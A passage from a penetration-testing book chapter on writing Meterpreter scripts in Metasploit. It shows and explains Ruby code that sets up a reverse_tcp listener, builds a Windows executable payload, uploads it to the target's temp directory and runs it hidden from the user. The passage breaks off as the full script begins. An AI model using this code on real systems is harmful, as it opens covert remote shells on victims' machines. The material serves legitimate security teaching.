246
Chapter 16
mul.datastore['PAYLOAD'] = payload
mul.datastore['EXITFUNC'] = 'process'
mul.datastore['ExitOnSession'] = true
mul.exploit_simple(
'Payload' => mul.datastore['PAYLOAD'],
'RunAsJob' => true
)
We define our payload as a
windows/meterpreter/reverse_tcp
at , generate
the payload calling the
client.framework.payloads.create(payload)
at , and
specify the necessary parameters to create the multi-handler. These are all
the required fields we need to set our payload using the
LHOST
and
LPORT
options
and create a listener.
Next we create our executable (
win32pe meterpreter
), upload it to our
target machine, and execute it:
if client.platform =~ /win32|win64/
tempdir = client.fs.file.expand_path("%TEMP%")
print_status("Uploading meterpreter to temp directory...")
raw = pay.generate
exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
tempexe = tempdir + "\\" + filename
tempexe.gsub!("\\\\", "\\")
fd = client.fs.file.new(tempexe, "wb")
fd.write(exe)
fd.close
print_status("Executing the payload on the system...")
execute_payload = "#{tempdir}\\#{filename}"
pid = session.sys.process.execute(execute_payload, nil, {'Hidden' => true})
end
The variables called
#{
something
}
have already been defined within the
script and will be called later. Notice that we already defined
tempdir
and
filename
. Moving into the script, we first include an if statement to detect
whether the platform we are targeting is a Windows-based system ; otherwise,
the attack won’t run. We then expand the temp directory on the target
machine; this would be the equivalent of
%TEMP%
. Next we create a new
file on the system and write out the new
EXE
we just generated from the
::Msf::Util::EXE.to_win32pe
call. Remember that we set the
session.sys
.process.execute
to
Hidden
so that the target user won’t see anything pop
up on his side.
Putting this all together, our final script should look something like this:
# Meterpreter script for uploading and executing another meterpreter exe
info = "Simple script for uploading and executing an additional meterpreter payload"
#
# Options